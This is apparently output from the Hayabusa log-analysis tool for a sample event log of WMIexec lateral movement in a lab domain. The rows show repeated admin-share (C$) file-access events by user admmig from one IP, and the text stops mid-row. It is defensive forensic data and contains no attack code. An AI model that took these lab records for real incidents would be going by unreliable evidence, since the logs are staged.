Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 